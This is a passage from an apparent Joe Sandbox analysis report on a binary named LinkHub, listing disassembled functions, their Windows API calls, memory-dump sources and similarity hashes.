                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                    • String ID:
                                                                    • API String ID: 3970641297-0
                                                                    • Opcode ID: 26beced86bd3faefe1d073b747640f811d5deeb6f26493a7d4f78114711b166d
                                                                    • Instruction ID: 6f98b81972ec65628901ba7889ced068b150cd7e641e6dad7828c570fe62c00d
                                                                    • Opcode Fuzzy Hash: 26beced86bd3faefe1d073b747640f811d5deeb6f26493a7d4f78114711b166d
                                                                    • Instruction Fuzzy Hash: 0711AD7250560CBFDF025F90CC58EEA7B6DFF48364F044216FA19A6260D7719C60EBA2
                                                                    Function 00CA33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CE11D9,00000000,00000000,?,00CA338D,00CE11D9,00000000,00000000,00000000,?,00CA35FE,00000006,FlsSetValue), ref: 00CA3418
                                                                    • GetLastError.KERNEL32(?,00CA338D,00CE11D9,00000000,00000000,00000000,?,00CA35FE,00000006,FlsSetValue,00D13260,FlsSetValue,00000000,00000364,?,00CA31B9), ref: 00CA3424
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CA338D,00CE11D9,00000000,00000000,00000000,?,00CA35FE,00000006,FlsSetValue,00D13260,FlsSetValue,00000000), ref: 00CA3432
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 1e21289d1f01d5bbae7dbd49f78b7aa0dfef927b4f553a53a02329d932913288
                                                                    • Instruction ID: ce22bf2bffc1922ffb6b32a7848df636201cb26ee244048b9ebb5f5139617e53
                                                                    • Opcode Fuzzy Hash: 1e21289d1f01d5bbae7dbd49f78b7aa0dfef927b4f553a53a02329d932913288
                                                                    • Instruction Fuzzy Hash: BF01F732611363ABCB228FB99C54A577F59BF0AB657200620F91AD7280C720DE01C6F0
                                                                    Function 00CDBA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00CDB69A,?,00008000), ref: 00CDBA8B
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CDB69A,?,00008000), ref: 00CDBAB0
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00CDB69A,?,00008000), ref: 00CDBABA
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CDB69A,?,00008000), ref: 00CDBAED
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: 0de0be8da136b07cf0513620baa36881d4635953af40abdae396351e0480545d
                                                                    • Instruction ID: 833cbf9c55f6ab346f742f32c71d67e8f7450f3f9c0dbd5d574b3dd052306572
                                                                    • Opcode Fuzzy Hash: 0de0be8da136b07cf0513620baa36881d4635953af40abdae396351e0480545d
                                                                    • Instruction Fuzzy Hash: 55115E31D00619D7CF00DFE5E9497EEBB78BF09711F124096E645B2340CB709A50DBA5
                                                                    Function 00D0886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00D0888E
                                                                    • ScreenToClient.USER32(?,?), ref: 00D088A6
                                                                    • ScreenToClient.USER32(?,?), ref: 00D088CA
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D088E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: a30ec8f1b53ec4b55e8448877de3985e1be3e3b2be84b1f8d7ae242bad5b1052
                                                                    • Instruction ID: 8b521c631a9a776644af68f7f7a2398e8afcf191e54def8657c23dcd4842edbb
                                                                    • Opcode Fuzzy Hash: a30ec8f1b53ec4b55e8448877de3985e1be3e3b2be84b1f8d7ae242bad5b1052
                                                                    • Instruction Fuzzy Hash: 1E1143B9D0020DAFDB41CF98D884AEEBBB5FB08310F508156E919E3250D735AA54DF60
                                                                    Function 00CD36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00CD3712
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD3723
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CD372A
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00CD3731
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: 61455cb2e9e5a30969223ed007bce1f6ada1b6fd05b8551e219a0e305d442f08
                                                                    • Instruction ID: 1f04c8be8b87f74751510ba770663a1f9ae399b956348ec2e3b76745143275d7
                                                                    • Opcode Fuzzy Hash: 61455cb2e9e5a30969223ed007bce1f6ada1b6fd05b8551e219a0e305d442f08
                                                                    • Instruction Fuzzy Hash: 9BE06DB11013687ADA2017A29C4DFEB7F6DDB86BA1F51001AF209D2280DAA18A40C2B2
                                                                    Function 00D092BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C71F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C71F87
                                                                      • Part of subcall function 00C71F2D: SelectObject.GDI32(?,00000000), ref: 00C71F96
                                                                      • Part of subcall function 00C71F2D: BeginPath.GDI32(?), ref: 00C71FAD
                                                                      • Part of subcall function 00C71F2D: SelectObject.GDI32(?,00000000), ref: 00C71FD6
                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00D092E3
                                                                    • LineTo.GDI32(?,?,?), ref: 00D092F0
                                                                    • EndPath.GDI32(?), ref: 00D09300
                                                                    • StrokePath.GDI32(?), ref: 00D0930E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: 8c4bbc3fd6caadb069a4726bd7cb87609a21c30f2bceee95b5bf218c7086c1ad
                                                                    • Instruction ID: e3b9744e9b1bfc65d5d53559f40728e2b9c968b1fa168543da5ae14709fa8b18
                                                                    • Opcode Fuzzy Hash: 8c4bbc3fd6caadb069a4726bd7cb87609a21c30f2bceee95b5bf218c7086c1ad
                                                                    • Instruction Fuzzy Hash: ADF0FE32045359BBDB125F94AC0EFDE3F5AAF0A320F048101FA19A52E2C77595629FF5
                                                                    Function 00C721A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 00C721BC
                                                                    • SetTextColor.GDI32(?,?), ref: 00C721C6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00C721D9
                                                                    • GetStockObject.GDI32(00000005), ref: 00C721E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ModeObjectStockText
                                                                    • String ID:
                                                                    • API String ID: 4037423528-0
                                                                    • Opcode ID: 1711a723c22750b4da819a82a5d8a3d981cb655282259c25a8daee822c7ca4b4
                                                                    • Instruction ID: 44dcadbde19a5798447942f942d9547f8bd62fbebe307ddf83ea817a3139af5a
                                                                    • Opcode Fuzzy Hash: 1711a723c22750b4da819a82a5d8a3d981cb655282259c25a8daee822c7ca4b4
                                                                    • Instruction Fuzzy Hash: EEE06531240780AADB215BB4AC097E83B12AB16336F04821AF7BD941E0C77146409B21
                                                                    Function 00CCEC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00CCEC36
                                                                    • GetDC.USER32(00000000), ref: 00CCEC40
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CCEC60
                                                                    • ReleaseDC.USER32(?), ref: 00CCEC81
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 39e7414dca6ba96689084f8bcd0bc79fe681578e4d2b3a65a22ab49df9c46a71
                                                                    • Instruction ID: 3182fc1300aa06f242a10799b0d7253e7bf9b92e2500aa2bd15be2a45dd005b5
                                                                    • Opcode Fuzzy Hash: 39e7414dca6ba96689084f8bcd0bc79fe681578e4d2b3a65a22ab49df9c46a71
                                                                    • Instruction Fuzzy Hash: 88E07EB5800308EFCB41AFE1D948B6DBBB6AB58311B50845AF94EE3350CB795942AF24
                                                                    Function 00CCEC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00CCEC4A
                                                                    • GetDC.USER32(00000000), ref: 00CCEC54
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CCEC60
                                                                    • ReleaseDC.USER32(?), ref: 00CCEC81
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 93e3b5559a05b59f693c828dad07a6a7ee37a9eb6147e7bc760a9857e8cb148d
                                                                    • Instruction ID: 344d68482001a0d27c7f3de9ebba561d9399beb6a5b2014e8b01ec4dd27f9ca7
                                                                    • Opcode Fuzzy Hash: 93e3b5559a05b59f693c828dad07a6a7ee37a9eb6147e7bc760a9857e8cb148d
                                                                    • Instruction Fuzzy Hash: CFE092B5C00308EFCB51AFE0D948B5DBBB6BB58315B50845AF94EE3350CB796901AF24
                                                                    Function 00CE57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00CE5919
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Connection_wcslen
                                                                    • String ID: *$LPT
                                                                    • API String ID: 1725874428-3443410124
                                                                    • Opcode ID: 382580f4fb6b0f78566b342044990e8809d2859f692cce8da97a99f60dbe7962
                                                                    • Instruction ID: 01df307cb8b96d35bad8f682e5bf14f8b33c33b94e8fecd9fe23eb85c7d6fa42
                                                                    • Opcode Fuzzy Hash: 382580f4fb6b0f78566b342044990e8809d2859f692cce8da97a99f60dbe7962
                                                                    • Instruction Fuzzy Hash: CE918C75A00644DFCB14DF55C4C4EAABBF1AF44308F188099E85A9F3A2C771EE86DB90
                                                                    Function 00C9E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00C9E67D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__start
                                                                    • String ID: pow
                                                                    • API String ID: 3213639722-2276729525
                                                                    • Opcode ID: ad1961a4c6a75e09f33f96be9bc8ffad560e4ab5161841ee87d06580d3927b3f
                                                                    • Instruction ID: cdd51377e4a6d9abbf2aa0464424b9be41a3e5b62d0d0aaa95b681c7a21af0a2
                                                                    • Opcode Fuzzy Hash: ad1961a4c6a75e09f33f96be9bc8ffad560e4ab5161841ee87d06580d3927b3f
                                                                    • Instruction Fuzzy Hash: 4E517D61E0820797CF15F714CD053BE2BB0AB71B44F208D58F0B1813E9EF358E9AAA56
                                                                    Function 00C8A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: 0b0af281f612bdf08e466a24f0e8b8aa2eeaf821427d3985343ad76b30a2c055
                                                                    • Instruction ID: 9b58a2a0e7ce0ef0689f9279e0119daedb7e3c68ab7fec63f3a89da5b7a1c917
                                                                    • Opcode Fuzzy Hash: 0b0af281f612bdf08e466a24f0e8b8aa2eeaf821427d3985343ad76b30a2c055
                                                                    • Instruction Fuzzy Hash: 71514331508246DFEF29EF28C451FBB7BA4EF15314F64405AF8A19B280DB309E86DB65
                                                                    Function 00C8F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00C8F6DB
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C8F6F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: ee0beb73c152b5dc9e30300fc266d4cafcaebc8065589ea05e8c546ae4382d7b
                                                                    • Instruction ID: 70abb9ade9d556e479136ee8572e9166d63082492053f15f92f5267a950dade4
                                                                    • Opcode Fuzzy Hash: ee0beb73c152b5dc9e30300fc266d4cafcaebc8065589ea05e8c546ae4382d7b
                                                                    • Instruction Fuzzy Hash: EA515B725087489BD320AF10DC86BAFB7E8FF94314F81885DF1D981195DF708529DB66
                                                                    Function 00CF61A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper_wcslen
                                                                    • String ID: CALLARGARRAY
                                                                    • API String ID: 157775604-1150593374
                                                                    • Opcode ID: bf2daeb810156763c4c112b5d776b9319133d0b8f3196c733619b0d46eedaf84
                                                                    • Instruction ID: 136aa718a5822fc5ec2fc43f27b885dfea6365d62f4aee49d1ba242277691368
                                                                    • Opcode Fuzzy Hash: bf2daeb810156763c4c112b5d776b9319133d0b8f3196c733619b0d46eedaf84
                                                                    • Instruction Fuzzy Hash: 0D41E171E002099FCB00DFA5C885AFEBBB5FF59324F10402AE615A7352E7309E81CB90
                                                                    Function 00CEDB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00CEDB75
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CEDB7F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_wcslen
                                                                    • String ID: |
                                                                    • API String ID: 596671847-2343686810
                                                                    • Opcode ID: e922a7a1f7c6c09ba671352e0c2053c5ff3c012611ffdc33e0b7f2dce1e01c24
                                                                    • Instruction ID: 28f76c52ffb3ecb331f4bfe2d7dc1298013f5a47a3c49c2c2367a4298a54f8db
                                                                    • Opcode Fuzzy Hash: e922a7a1f7c6c09ba671352e0c2053c5ff3c012611ffdc33e0b7f2dce1e01c24
                                                                    • Instruction Fuzzy Hash: 76315C71801119AFCF15DFA1CC89AEEBFB9FF04344F104029F919A6262EB719A06DB60
                                                                    Function 00D04008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00D040BD
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D040F8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: 226566b3c87eabfa2cb8a93e50d472ea29bde82df7fd42397e4a3c078761ce5d
                                                                    • Instruction ID: 780a121e6145cb046fef05d3e51e31bd7089f0a279a0f68a7c4717a0a2f00342
                                                                    • Opcode Fuzzy Hash: 226566b3c87eabfa2cb8a93e50d472ea29bde82df7fd42397e4a3c078761ce5d
                                                                    • Instruction Fuzzy Hash: 8A316EB1510604AADB24DF64CC80FBB77A9FF48724F048619FA99971D0DA75AC81D770
                                                                    Function 00D04FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00D050BD
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D050D2
                                                                    Strings
                                                                    Memory Dump Source
